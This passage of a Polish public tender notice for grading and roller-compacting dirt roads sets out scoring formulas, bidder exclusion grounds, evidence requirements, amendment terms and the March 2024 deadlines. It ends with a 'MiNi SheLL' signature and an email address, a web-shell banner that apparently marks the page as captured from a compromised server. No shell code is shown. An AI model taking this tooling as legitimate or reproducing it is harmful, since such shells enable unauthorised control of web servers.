<br/>gdzie; <br/>con - najniższa jednostkowa cena ryczałtowa brutto za wykonanie 1m2 równania - profilowania drogi gruntowej wraz z wykonaniem zagęszczenia drogi gruntowej przez wałowanie 1m2 walcem ze wszystkich złożonych, ważnych ofert, <br/>cob - jednostkowa cena ryczałtowa brutto za wykonanie 1m2 równania - profilowania drogi gruntowej wraz z wykonaniem zagęszczenia drogi gruntowej przez wałowanie 1m2 walcem z ważnej oferty badanej, <br/><br/>ad 2) najkrótszy czas reakcji - oznacza czas w jakim Wykonawca przystąpi do wykonywania usługi liczony od momentu zgłoszenia Zamawiającego – waga 40% znaczenia,<br/>w ramach kryterium najkrótszego czasu reakcji Wykonawca może zadeklarować czas reakcji na podjęcie działań związanych z rozpoczęciem prac równania – profilowania liczony od momentu zgłoszenia przez Zamawiającego, <br/>– rozpatrywany będzie czas reakcji zadeklarowany przez Wykonawcę podany w Formularzu Oferty, pod uwagę będzie brany najkrótszy czas reakcji wynoszący 24 godziny, ale nie dłuższy niż 120 godzin, <br/>maksymalną ilość 40pkt. otrzyma Wykonawca oferujący najkrótszy możliwy w kryterium czas reakcji – tj. 24 godziny, pozostali Wykonawcy otrzymają proporcjonalnie mniejszą ilość punktów, wg poniższego wzoru: <br/>zastosowany wzór do obliczenia punktowego, kryterium czas reakcji; <br/> wzór nmczr : czrob x 100pkt. x 40% <br/>gdzie, <br/>nmczr – najkrótszy możliwy czas reakcji przewidziany w siwz (ilość zaoferowana przez Wykonawcę w swojej ofercie powyżej 24 godzin, a nie przekraczająca 120 godzin) <br/>czrob – czas reakcji z oferty badanej (czas reakcji zaoferowany przez Wykonawcę w swojej ofercie powyżej 24 godz., a nie przekraczający 120 godzin) <br/><br/>Z uwagi na ograniczoną ilość znaków do wpisania pozostała treść sposobu oceny ofert została przedstawiona w rozdziale XVI oraz XVII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji - najkrótszy czas reakcji - oznacza czas w jakim Wykonawca przystąpi do wykonywania usługi liczony od momentu zgłoszenia Zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu w okolicznościach, o których mowa w art. 108 ust. 1;<br/>2) spełniają warunki udziału w postępowaniu, określone przez Zamawiającego w ust. 8 niniejszego rozdziału SWZ.<br/><br/>2. Podstawy wykluczenia, o których mowa w art 108 ust. 1<br/>Z postępowania o udzielenie zamówienia wyklucza się w przypadkach o których mowa w art. 108 ust. 1 pkt 1-6 Pzp (obligatoryjne przesłanki wykluczenia), z zastrzeżeniem art. 110 ust. 2 Pzp, Wykonawcę:<br/>1) będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a) udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie przestępstwa lub przestępstwa skarbowego, o którym mowa w art. 258 Kodeksu karnego,<br/>b) handlu ludźmi, o którym mowa w art. 189a Kodeksu karnego,<br/>c) o którym mowa w art. 228-230a, art. 250a Kodeksu karnego, w art. 46-48 ustawy z dnia 25 czerwca 2010 r. o sporcie (Dz. U. z 2020 r. poz. 1133 oraz z 2021 r. poz. 2054) lub w art. 54 ust. 1-4 ustawy z dnia 12 maja 2011 r. o refundacji leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych <br/>(Dz. U. z 2021 r. poz. 523, 1292, 1559 i 2054),<br/>d) finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art. 165a Kodeksu karnego, lub przestępstwo udaremniania lub utrudniania stwierdzenia przestępnego pochodzenia pieniędzy lub ukrywania ich pochodzenia, o którym mowa w art. 299 Kodeksu karnego,<br/>e) o charakterze terrorystycznym, o którym mowa w art. 115 § 20 Kodeksu karnego, lub mające na celu popełnienie tego przestępstwa,<br/>f) powierzenia wykonywania pracy małoletniemu cudzoziemcowi, o którym mowa w art. 9 ust. 2 ustawy z dnia 15 czerwca 2012 r. o skutkach powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej (Dz. U. poz. 769),<br/>g) przeciwko obrotowi gospodarczemu, o których mowa w art. 296-307 Kodeksu karnego, przestępstwo oszustwa, o którym mowa w art. 286 Kodeksu karnego, przestępstwo przeciwko wiarygodności dokumentów, o których mowa w art. 270-277d Kodeksu karnego, lub przestępstwo skarbowe,<br/>h) o którym mowa w art. 9 ust. 1 i 3 lub art. 10 ustawy z dnia 15 czerwca 2012 r. o skutkach powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej<br/>- lub za odpowiedni czyn zabroniony określony w przepisach prawa obcego;<br/>2) jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce jawnej lub partnerskiej albo komplementariusza w spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie skazano za przestępstwo, o którym mowa w pkt 1;<br/>3) wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, chyba że wykonawca odpowiednio przed upływem terminu do składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;<br/>4) wobec którego prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>5) jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że wykonawca zawarł z innymi wykonawcami porozumienie mające na celu zakłócenie konkurencji, w szczególności jeżeli należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty, oferty częściowe lub wnioski o dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie;<br/>6) jeżeli, w przypadkach, o których mowa w art. 85 ust. 1 ustawy, doszło do zakłócenia konkurencji wynikającego z wcześniejszego zaangażowania tego wykonawcy lub podmiotu, który należy z wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie konkurencji może być wyeliminowane w inny sposób niż przez wykluczenie wykonawcy <br/>z udziału w postępowaniu o udzielenie zamówienia.<br/><br/>3. Z postępowania o udzielenie zamówienia wyklucza się w przypadkach o których mowa w art. 7 ust. 1 ustawy z <br/>dnia 13 kwietnia 2022 r., o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, Wykonawcę: <br/>1) wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 <br/>pkt 3 ustawy; <br/>2) którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu <br/>pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy; <br/>3) którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006<br/>i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.”<br/><br/>4. Wykonawca może zostać wykluczony przez zamawiającego na każdym etapie postępowania o udzielenie zamówienia.<br/><br/>5. Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1 - 6 ustawy, jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki:<br/>1) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne;<br/>2) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania, lub zamawiającym;<br/>3) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:<br/>a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy,<br/>b) zreorganizował personel,<br/>c) wdrożył system sprawozdawczości i kontroli,<br/>d) utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów,<br/>e) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.<br/><br/>6. Zamawiający ocenia. <br/>Zamawiający czy podjęte przez wykonawcę czynności, o których mowa w ust. 5, są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykonawcy. Jeżeli podjęte przez Wykonawcę czynności, o których mowa w ust. 3, nie są wystarczające do wykazania jego rzetelności, Zamawiający wyklucza wykonawcę. Wykluczenie Wykonawcy następuje zgodnie z art. 111 ustawy Pzp. <br/><br/>7. Podstawy wykluczenia, o których mowa w art. 109 ust. 1, jeżeli Zamawiający je przewiduje.<br/>Zamawiający nie przewiduje podstaw wykluczenia z postępowania, o których mowa w art. 109 ust. 1 ustawy Pzp<br/><br/>8. Wykonawca musi spełnić warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy Pzp, dotyczące:<br/>1) Zdolność do występowania w obrocie gospodarczym: <br/> Zamawiający nie określa warunku w tym zakresie. <br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej: <br/> Zamawiający nie określa warunku w tym zakresie.<br/>3) Sytuacja ekonomiczna lub finansowa: <br/> Zamawiający nie określa warunku w tym zakresie.<br/>4) Zdolność techniczna lub zawodowa:<br/>Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień składania, następujących podmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej:<br/>- wykazu potwierdzającego że; w okresie ostatnich trzech lat przed wszczęciem postępowania, przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy to w tym okresie, wykonawca wykonał lub wykonuje minimum jedno zamówienie z kategorii usług z zakresu bieżącej konserwacji dróg gruntowych polegającej na równaniu – profilowaniu mechanicznym wraz z zagęszczaniem przez wałowanie walcem w zakresie niezbędnym do wykazania spełnienia warunku zdolności technicznej lub zawodowej (wzór wykazu wykonanych usług stanowi zał. nr 6 do SWZ),<br/>z podaniem ich wartości, przedmiotu zamówienia, dat wykonania i nazw oraz adresów odbiorców – zamawiających,<br/>z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie.<br/><br/>Uwaga: w wykazie wykonanych lub wykonywanych usług należy zwrócić uwagę na wykazywany zakres rzeczowy, porównywalny do wynikającego z przedmiotowego postępowania.<br/><br/>9. Podmiotowe środki dowodowe.<br/>Zamawiający zażąda przedstawienia podmiotowych środków dowodowych od Wykonawcy, którego oferta zostanie najwyżej oceniona. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie braku podstaw wykluczenia z postępowania;<br/>- oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu na podstawie art. 125 ust. 1 ustawy Pzp, według załącznika nr 2 do SWZ. <br/>- oświadczenia Wykonawcy o przynależności lub braku przynależności do tej samej grupy kapitałowej w zakresie art. 108 ust. 1 pkt 5 Pzp, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ, lub odpowiadające im dokumenty zgodnie z rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).<br/>- oświadczenia Wykonawcy/ów o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 <br/>ust. 1 Pzp, w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 3-6 Pzp,<br/> oraz na podstawie art. 7 ust. 1 pkt. 1-3 ustawy z dnia 13 kwietnia 2022 r., o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, zgodnie ze wzorem stanowiącym załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, <br/>nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień składania, następujących podmiotowych środków dowodowych potwierdzających:<br/>1) spełnianie warunków udziału w postępowaniu:<br/>- wykazu wykonanych usług potwierdzającego że; w okresie ostatnich trzech lat przed wszczęciem postępowania, przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy to w tym okresie, wykonawca wykonał lub wykonuje minimum jedno zamówienie z kategorii usług z zakresu bieżącej konserwacji dróg gruntowych polegającej na równaniu – profilowaniu mechanicznym wraz z zagęszczaniem przez wałowanie walcem w zakresie niezbędnym do wykazania spełnienia warunku zdolności technicznej lub zawodowej (wzór wykazu stanowi zał. nr 6 do SWZ), z podaniem ich wartości, przedmiotu zamówienia, dat wykonania i nazw oraz adresów odbiorców – zamawiających, z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie.<br/>Uwaga: w wykazie wykonanych lub wykonywanych usług należy zwrócić uwagę na wykazywany zakres rzeczowy, porównywalny do wynikającego z przedmiotowego postępowania.<br/>- oświadczenie dotyczące podmiotu trzeciego, w celu wykazania braku istnienia wobec niego podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby, jeżeli Wykonawca polega na zasobach podmiotu trzeciego, wg wzoru – załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę).<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć wraz z ofertą stosowne pełnomocnictwo (nie dotyczy spółki cywilnej), o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia – każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. <br/>6. Powyższe oznacza, iż:<br/>1) Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia;<br/>2) Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; <br/>dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub <br/>przez pełnomocnika występującego w imieniu wszystkich podmiotów. <br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>7. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień niniejszej umowy może nastąpić wyłącznie za zgodą obu Stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.<br/>2. Strona umowy nie ponosi odpowiedzialności względem drugiej Strony za niewykonanie lub nienależyte wykonanie zobowiązań wynikających z umowy, jeżeli niewykonanie lub nienależyte wykonanie jest skutkiem okoliczności zewnętrznych, na których wystąpienie strona nie miała żadnego wpływu i których nie mogła uniknąć ani im zapobiec, ani też nie mogła ich wystąpienia przewidzieć w chwili podpisania umowy, przy zachowaniu należytej staranności (Siła Wyższa).<br/>1) Przez okoliczności Siły Wyższej, dla potrzeb tej umowy, rozumie się w szczególności: zamieszki, rozruchy, katastrofy naturalne, stan epidemii (stan zagrożenia epidemicznego), stan wojenny, stan wyjątkowy, stan klęski żywiołowej wojnę, akty normatywne, decyzje administracyjne wydane przez uprawnione organy administracji publicznej, w tym także<br/>mające na celu zapobieżenie lub usunięcie (zmniejszenie rozmiaru) skutków wystąpienia Siły Wyższej.<br/>2) Strona, która powołuje się na przeszkodę w wykonaniu lub należytym wykonaniu Umowy z powodu Siły Wyższej, jest zobowiązana niezwłocznie, nie później jednak niż w terminie 14 dni od jej wystąpienia, powiadomić drugą Stronę o takich okolicznościach oraz ich przyczynie. Strony niezwłocznie ustalą zakres i sposób realizacji Umowy, w tym odpowiednie przesunięcie terminów, jeśli okażę się to konieczne. Strona zgłaszająca okoliczności Siły Wyższej jest zobowiązana kontynuować wykonywanie zobowiązań wynikających z Umowy w takim stopniu, w jakim jest to możliwe, jest też zobowiązana poszukiwać racjonalnych alternatywnych sposobów zrealizowania zakresu Umowy, jaki nie podlega wpływowi Siły Wyższej.<br/>3) W przypadku, gdy spowodowane Siłą Wyższą przeszkody w wykonywaniu lub należytym wykonywaniu zobowiązań umownych będą trwać nieprzerwanie przez okres 30 dni lub dłużej, Strony mogą w drodze wzajemnych uzgodnień rozwiązać Umowę bez skutków, które Umowa lub prawo wiąże z odpowiedzialnością za rozwiązanie Umowy z powodu<br/>jej niewykonania lub nienależytego wykonania, i bez nakładania na żadną ze Stron dalszych zobowiązań.<br/>4) Rozliczeniu podlega jedynie faktycznie i prawidłowo zrealizowana część przedmiotu Umowy; w protokole <br/>inwentaryzacyjnym zostanie opisany zakres, w jakim Umowy została zrealizowana.<br/>3. Zamawiający dopuszcza możliwość wprowadzania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w opisanych poniżej sytuacjach:<br/>1) Termin realizacji zamówienia może ulec zmianie w sytuacji;<br/>- wystąpienia niekorzystnych warunków atmosferycznych powodujących wstrzymanie wykonania umowy, potwierdzonych <br/> pisemnie przez Zamawiającego, przy czym przesunięcie terminu prac nastąpi o tyle dni, przez ile trwało ich wstrzymanie,<br/>- pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego w uzasadnionych przypadkach,<br/>2) Inne możliwe zmiany w postanowieniach umowy;<br/>- zmiany podwykonawców w zakresie określonym w ofercie lub wprowadzenie nowych, <br/>- zmiana wynikająca ze zmiany danych podmiotowych Wykonawcy.<br/>3) Wynagrodzenie Wykonawcy określone w umowie może ulec zmianie w sytuacji;<br/>- zmiany stawki podatku od towarów i usług,<br/>- zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 negocjacje Trójstronnej Komisji <br/> w sprawie minimalnego wynagrodzenia ust. 3–5 ustawy z dnia 10 października 2002 r. o min. wynagrodzeniu za pracę,<br/>- zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na <br/> ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany powyższe będą miały wpływ na koszty wykonania zamówienia <br/> przez Wykonawcę,<br/><br/>Z uwagi na ograniczoną możliwość wpisania większej ilości znaków pozostałe zapisy przewidywanych zmian umowy zostały przedstawione w projektowanych postanowieniach umowy - zał. nr 7 do SWZ par. 11. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lwowek</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-25 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com